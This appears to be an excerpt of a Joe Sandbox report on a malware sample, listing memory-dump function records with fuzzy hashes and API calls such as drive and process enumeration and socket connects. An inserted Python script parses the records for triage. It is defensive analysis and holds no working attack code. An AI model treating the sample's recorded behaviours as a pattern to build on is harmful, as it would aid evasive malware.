                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: 29a477aaab27a1117c2e2825dad7c4c36f135b9d70fb20e81f2e46e931305d82
                                                      • Instruction ID: 19b9cee10eb34ec0c58fabf7678765a5202242c4846f1f0c79e99c4a2804ea2c
                                                      • Opcode Fuzzy Hash: 29a477aaab27a1117c2e2825dad7c4c36f135b9d70fb20e81f2e46e931305d82
                                                      • Instruction Fuzzy Hash: 4E41A0EB57C125BE626291852B94AFB6BAEF5F7730B308466F407D5602E2E40BCD1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: cedcbd9457ca3a13d6d8b9e192163a44e90c8fba4e892fbc60c9411597087158
                                                      • Instruction ID: d73128eef35218a532dc6f06ad4461fd6a2948bc5356e3338c92ab95b7640901
                                                      • Opcode Fuzzy Hash: cedcbd9457ca3a13d6d8b9e192163a44e90c8fba4e892fbc60c9411597087158
                                                      • Instruction Fuzzy Hash: 4941B1EB57C121BEB26291952B94AFA6BAEF5F7730B308467F407D5602E2D40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 624e8dafbeb1a22c4b4719423b055cdddf40a85ca2e4ccb855d38f41d61ecf84
                                                      • Instruction ID: db442c24e78c30c42c4fce64868aea746155517c48488156be6d677b7fdaac7d
                                                      • Opcode Fuzzy Hash: 624e8dafbeb1a22c4b4719423b055cdddf40a85ca2e4ccb855d38f41d61ecf84
                                                      • Instruction Fuzzy Hash: C041D1EB57C120BE726291852B94AFB6BAEF5F7730B308466F407D5602E2E40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: f7d4c8bea5ed2df73dcc194597a951802d861d4d29ba943b7ab8279e460eca87
                                                      • Instruction ID: 0960b9709eb242520b1f28abae332402e23f67d61770e2ff746f24da3f934909
                                                      • Opcode Fuzzy Hash: f7d4c8bea5ed2df73dcc194597a951802d861d4d29ba943b7ab8279e460eca87
                                                      • Instruction Fuzzy Hash: 4041CFEB57C120BE726291962B98AFB6BADF5F7730B308466F407D5502E2D40BCD1172
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 4992f1f6c99d7f5c2f47aa3cfe5a13a831947473df9075be709b2107076a7def
                                                      • Instruction ID: 79f5c633f35e8ec1e6be71c744da7b5a252e3dcec36b2fcfe05691d3023df933
                                                      • Opcode Fuzzy Hash: 4992f1f6c99d7f5c2f47aa3cfe5a13a831947473df9075be709b2107076a7def
                                                      • Instruction Fuzzy Hash: 6641C1EB57C120BE716291952B94AFB6BAEF5F7730B308466F407D5602E2D40BCD1132
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 845e699625bf04038dd1f4b6ba3848ad09b8ba154daa76991c845390c2ab5322
                                                      • Instruction ID: b4bcc4ce75b5477728c266ca0753f2163b4b2d66a2d71a543891da4c1379160c
                                                      • Opcode Fuzzy Hash: 845e699625bf04038dd1f4b6ba3848ad09b8ba154daa76991c845390c2ab5322
                                                      • Instruction Fuzzy Hash: AD41BFEB17C114BEB16291952B94AFB6BADF6F7730B308426F407D5502E2E40BCE1131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\
                                                      • API String ID: 0-3379428675
                                                      • Opcode ID: cc6ec367dfc52e6ed95785f93ed6c48162265f4217032be829b335120c7444df
                                                      • Instruction ID: cc36cfd1555d24ffab7401f31652cc1837b79c4b2e0919de86e543d52f369f97
                                                      • Opcode Fuzzy Hash: cc6ec367dfc52e6ed95785f93ed6c48162265f4217032be829b335120c7444df
                                                      • Instruction Fuzzy Hash: D741BFEB57C120BE726291962B94AFA6BAEF5F7730B308467F407D5602E2D40BCD1132
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 55e1e60feea73787a97848ecef63c485ad372ca95f0e9422d596a2ee691ac4bc
                                                      • Instruction ID: 2500ee74dabf79e030535337be6bb9abbc20933df68fb8d30be5283f366bc34c
                                                      • Opcode Fuzzy Hash: 55e1e60feea73787a97848ecef63c485ad372ca95f0e9422d596a2ee691ac4bc
                                                      • Instruction Fuzzy Hash: 58315AEB17C125BEB16291962B98AFB6BADF5E7730B308427F407D5502E2E40BCD1171
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      • Opcode ID: 6ae22c71ff80158239a5167ac7d953f22bc8991a4b6a9ecea7fc559ae973bb47
                                                      • Instruction ID: c6b91ee2b6031d4ece28243a6df575264cdded52c48ea37eae824901488370de
                                                      • Opcode Fuzzy Hash: 6ae22c71ff80158239a5167ac7d953f22bc8991a4b6a9ecea7fc559ae973bb47
                                                      • Instruction Fuzzy Hash: B541BFEB13C120BEB26291962B94AFB6BADF5E7730B30C436F407D5502E2E40B8D1171
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: FD %s:%d sclose(%d)
                                                      • API String ID: 2781271927-3116021458
                                                      • Opcode ID: cd12522a89362346d0c5a71f95b566ebd6f641182769ebd3b9b3b473e206239e
                                                      • Instruction ID: cb1929e9cbb457f7135dc8f27e7855702d96f14f1e950b7434ee6e3deb0ae4ce
                                                      • Opcode Fuzzy Hash: cd12522a89362346d0c5a71f95b566ebd6f641182769ebd3b9b3b473e206239e
                                                      • Instruction Fuzzy Hash: AFD05E32A092213B852069996C58C4B7BA8DEC6F60F460CAAF94077304F1249D0083F2
                                                      APIs
                                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0059B29E,?,00000000,?,?), ref: 0059B0B9
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00583C41,00000000), ref: 0059B0C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastconnect
                                                      • String ID:
                                                      • API String ID: 374722065-0
                                                      • Opcode ID: ce96786ad1ab3b59b284a3cbec816e29d7eb10181c9aa1775580c855221a0876
                                                      • Instruction ID: 2b7b561801f1d8f76fc3d0f6c14e24306682ddc49511051378a02a7e01e393cf
                                                      • Opcode Fuzzy Hash: ce96786ad1ab3b59b284a3cbec816e29d7eb10181c9aa1775580c855221a0876
                                                      • Instruction Fuzzy Hash: BB01D8322042005BFE205A79AD48F6BBBA9FF89764F140B24F97CA31D1D726DD508752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a6d32ea4aa8c0f70233d9f2784dc51aabd5a1aff4c7093469110fea0133d9b9
                                                      • Instruction ID: 709d45345142fae09dc5e20be744ec10ba778ef8c4796d9606e0beed5d91463b
                                                      • Opcode Fuzzy Hash: 3a6d32ea4aa8c0f70233d9f2784dc51aabd5a1aff4c7093469110fea0133d9b9
                                                      • Instruction Fuzzy Hash: BC51C2E757C221BEB22291416F5CEFB676EE6C3730B318467F802D6542E2E54E8A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6b12606bef91e20664c209574be90d3b69aea370fc8b430a296022f45c833627
                                                      • Instruction ID: b51befff7f2c685a6a92b63e05bf0fc1832517913b553b7df768b0a42c069635
                                                      • Opcode Fuzzy Hash: 6b12606bef91e20664c209574be90d3b69aea370fc8b430a296022f45c833627
                                                      • Instruction Fuzzy Hash: AC51C3F757C251AEB26291416F58EFB676ED6C3730B308427F807D6242E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 764314848fa67a3f2f6d2e8c7c1dbf55cd60d8759ebde3f62ddb99b099c0121f
                                                      • Instruction ID: d9bce9c82d5c20d0c01cfd27a32c4b28887c7904a4ed4ad64d61aef31089abbf
                                                      • Opcode Fuzzy Hash: 764314848fa67a3f2f6d2e8c7c1dbf55cd60d8759ebde3f62ddb99b099c0121f
                                                      • Instruction Fuzzy Hash: 8141A1E717C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ad68e93106ad25869515e2639985b225e502c0be73d4e23fe8e3945d4079cec1
                                                      • Instruction ID: eeac43fe8bf36602192f838cafbe07f6d26d57d3d86b29bbec786ab91f30cb2a
                                                      • Opcode Fuzzy Hash: ad68e93106ad25869515e2639985b225e502c0be73d4e23fe8e3945d4079cec1
                                                      • Instruction Fuzzy Hash: 07417FE757C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1b79fc70e32d9dc7b016783767c7c4120415dd4211299f6f0aee5dd95b9476e
                                                      • Instruction ID: b5d66d895dac5a1fdcf238ad546ae177bf154f6745c8d3ad7220e4d687307e59
                                                      • Opcode Fuzzy Hash: e1b79fc70e32d9dc7b016783767c7c4120415dd4211299f6f0aee5dd95b9476e
                                                      • Instruction Fuzzy Hash: 83417DE757C221BEB27191422B58EFB676EE6C3730B308427F807D6541E2E54E8A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 1a74abf0a703e5fab24f0cbb9ef797d5e4aa0d345bf2585ec8e45a049f64ce50
                                                      • Instruction ID: f0d8d8af57bfd8b685519092ebdb03ddf189b9913d0c3aced5206b086d902dca
                                                      • Opcode Fuzzy Hash: 1a74abf0a703e5fab24f0cbb9ef797d5e4aa0d345bf2585ec8e45a049f64ce50
                                                      • Instruction Fuzzy Hash: 03417EE757C221BEB26191426B58EFB676EE6C3730B30842BB806D6541E2E90E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ee0a282a34692ca04803a68053e2bc2091d1d3b882fd7744ffdf65bcdfb0567a
                                                      • Instruction ID: 4277d9afe9ef3dc87d92a617ae7ae54e00d1f145f85a422f88240ee1263059b1
                                                      • Opcode Fuzzy Hash: ee0a282a34692ca04803a68053e2bc2091d1d3b882fd7744ffdf65bcdfb0567a
                                                      • Instruction Fuzzy Hash: C04160E767C221BE726191422F58EFB576EE6C3730B308427B806D6541E2E54E896071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 2a99b8d34b31357ec7a922e30426af946a002a321b5cd63d78e15d1e61e6ef44
                                                      • Instruction ID: cdea619f002814c008ac2bd92d4519f087eec3edfaa43d190efffdaa15baa4aa
                                                      • Opcode Fuzzy Hash: 2a99b8d34b31357ec7a922e30426af946a002a321b5cd63d78e15d1e61e6ef44
                                                      • Instruction Fuzzy Hash: 6C41B2E767C221BEB22181522B58EFB576EE6C3730B30842BF803D6542E3D50E8A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 940540ed3454ac4e72b5bf1793eec7274405c43cb75e94a5fd0643cf738e3616
                                                      • Instruction ID: 589404f62e7e7091566f1fc9be66f48e6a17771af176518f7e3757f211bab9ed
                                                      • Opcode Fuzzy Hash: 940540ed3454ac4e72b5bf1793eec7274405c43cb75e94a5fd0643cf738e3616
                                                      • Instruction Fuzzy Hash: 3F41C2EB13C111BEB222D1962B55AFAABADF6E7730B30C427F447D9502E2D40A8E1171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e59f24cd0177b20453bd5e9016f6dc14100a425f0be06e3ea75bb3b341d06f3
                                                      • Instruction ID: eaf545161507c56d90cc9d1d5bf88ae80f5f3d25310b5c9b5d5038e40124882b
                                                      • Opcode Fuzzy Hash: 5e59f24cd0177b20453bd5e9016f6dc14100a425f0be06e3ea75bb3b341d06f3
                                                      • Instruction Fuzzy Hash: 5A4150E757C221BEB17181422F58EFB576EE6C3730B318427F807D6541E2E54E9A6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0da1d15bc5373b0c2f5953396225085c5e4f3bca4ac0b80048f52f3c4850eb8b
                                                      • Instruction ID: 8b162329a21a734da1cedacc7d75959d968d5517430c7bc871427c24f6f83925
                                                      • Opcode Fuzzy Hash: 0da1d15bc5373b0c2f5953396225085c5e4f3bca4ac0b80048f52f3c4850eb8b
                                                      • Instruction Fuzzy Hash: 71316FE757C221BEB27181422B58EFB576EE6C3730B318427F807D6641E2E90E996071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 65634b6a808c18eceec5b6ec202bc079420a6c5f145a96f67af1674761797ce6
                                                      • Instruction ID: 4780b2d44726cabd2d7bb543cfd2a0ed9f78cb0fe29d225e2680944216bf2ba9
                                                      • Opcode Fuzzy Hash: 65634b6a808c18eceec5b6ec202bc079420a6c5f145a96f67af1674761797ce6
                                                      • Instruction Fuzzy Hash: CA317EE757C221BEB27181422B58EFA576EE6C3730B318427B807D6641E3E94E9A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: c42cd32e9628c91328a6dc78236a2b78bfd5eed236c199d3081dcf759de8e94a
                                                      • Instruction ID: 2a95822d41c18d603a2fb73cf8a5a5cd17ce09618503542ddc9fb7ea22c61586
                                                      • Opcode Fuzzy Hash: c42cd32e9628c91328a6dc78236a2b78bfd5eed236c199d3081dcf759de8e94a
                                                      • Instruction Fuzzy Hash: 7B314AEB138121BDB16291962BA5BFB6BADF5F7730B30C436F807D6506E2D80A8D1131
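                                                       The Similarity entries above list several near-identical functions from the two dump regions that are not backed by a PE image, 07210000 (GetLogicalDrives, string "A:\") and 07260000 (Process32Next), each with a slightly different Instruction Fuzzy Hash, which is the pattern one expects from code that is unpacked or rewritten at run time. The Python script below is an added example, not Joe Sandbox code: it parses records in this listing's format, groups them by dump region and API ID, compares the Instruction Fuzzy Hashes within each group, and lists which API IDs were reached from non-PE-backed memory. The positional hex-digit comparison is an assumption made for illustration; the metric Joe Sandbox itself applies to these hashes is not documented on this page. The sample input is a subset of the records transcribed from this listing.

```python
"""Added example (not Joe Sandbox code): parse function records in the format
of the listing above, group them by dump region and API ID, and compare their
Instruction Fuzzy Hashes.  The positional hex-digit comparison is an assumption
made for illustration; the vendor's own similarity metric is not on the page."""
import re
from collections import defaultdict
from dataclasses import dataclass
from itertools import combinations

# Sample input: a subset of the records transcribed from the listing above
# (only the fields the parser uses; the DrivesLogical String ID is "A:\").
SAMPLE_LISTING = """\
• Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
• API ID: DrivesLogical
• String ID: A:\\
• Instruction Fuzzy Hash: 6641C1EB57C120BE716291952B94AFB6BAEF5F7730B308466F407D5602E2D40BCD1132
• Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
• API ID: DrivesLogical
• String ID: A:\\
• Instruction Fuzzy Hash: AD41BFEB17C114BEB16291952B94AFB6BADF6F7730B308426F407D5502E2E40BCE1131
• Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
• API ID: NextProcess32
• String ID:
• Instruction Fuzzy Hash: 8141A1E717C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
• Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
• API ID: NextProcess32
• String ID:
• Instruction Fuzzy Hash: 07417FE757C221BEB27195426B5CEFB676EE6C3730B308427F807D6641E2E50E896071
• Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
• API ID: gethostname
• String ID:
• Instruction Fuzzy Hash: 1551CFB06047028BEB30AB65D9497237EE4BF4131AF04093DED8AAB6D1E775E844CF12
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")


@dataclass
class Record:
    offset: int      # base of the dumped region (the "Offset:" value)
    pe_backed: bool  # "based on PE: true" means the dump maps to an on-disk PE image
    api_id: str
    string_id: str
    fuzzy: str       # Instruction Fuzzy Hash, treated as an opaque hex string


def parse_listing(text):
    """The Instruction Fuzzy Hash line is the last field of each record in this
    listing, so it closes the record being built."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.search(value)
            if s:
                cur["offset"], cur["pe_backed"] = int(s.group(1), 16), s.group(2) == "true"
        elif key in ("API ID", "String ID"):
            cur[key] = value
        elif key == "Instruction Fuzzy Hash":
            records.append(Record(cur.get("offset", 0), cur.get("pe_backed", False),
                                  cur.get("API ID", ""), cur.get("String ID", ""), value))
            cur = {}
    return records


def hex_distance(a, b):
    """Hex-digit positions at which two equal-length fuzzy hashes differ."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length; cannot compare positionally")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def variant_groups(records, max_ratio=0.25):
    """Group by (region offset, API ID); a group whose members differ in at
    most max_ratio of their digits is reported as near-identical variants."""
    groups = defaultdict(list)
    for r in records:
        groups[(r.offset, r.api_id)].append(r)
    summary = {}
    for key, recs in groups.items():
        dists = [hex_distance(x.fuzzy, y.fuzzy) for x, y in combinations(recs, 2)]
        worst = max(dists, default=0)
        summary[key] = {"count": len(recs), "pe_backed": recs[0].pe_backed,
                        "max_pair_distance": worst,
                        "near_identical": bool(dists) and worst <= max_ratio * len(recs[0].fuzzy)}
    return summary


def unbacked_api_calls(records):
    """API IDs reached from dumps with no PE image behind them, i.e. from code
    that existed only in memory (unpacked or injected) when the dump was taken."""
    return sorted({(hex(r.offset), r.api_id) for r in records if not r.pe_backed and r.api_id})


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for (offset, api), info in variant_groups(recs).items():
        print(f"{offset:#010x} {api:<14} {info}")
    print("calls from non-PE-backed memory:", unbacked_api_calls(recs))
```

Run against the full listing (paste the report's bullet lines into SAMPLE_LISTING or read them from a file), the two GetLogicalDrives records at 07210000 differ in 15 of 70 hex digits and the two Process32Next records at 07260000 in 5, while the PE-backed gethostname record at 004D0000 has no sibling to compare with; the same grouping makes the drive and process enumeration from non-PE-backed memory stand out from the image-backed network code, which is the distinction a triage analyst wants before deciding which dump to load into IDA.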
                                                      APIs
                                                      • gethostname.WS2_32(00000000,00000040), ref: 00584AA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
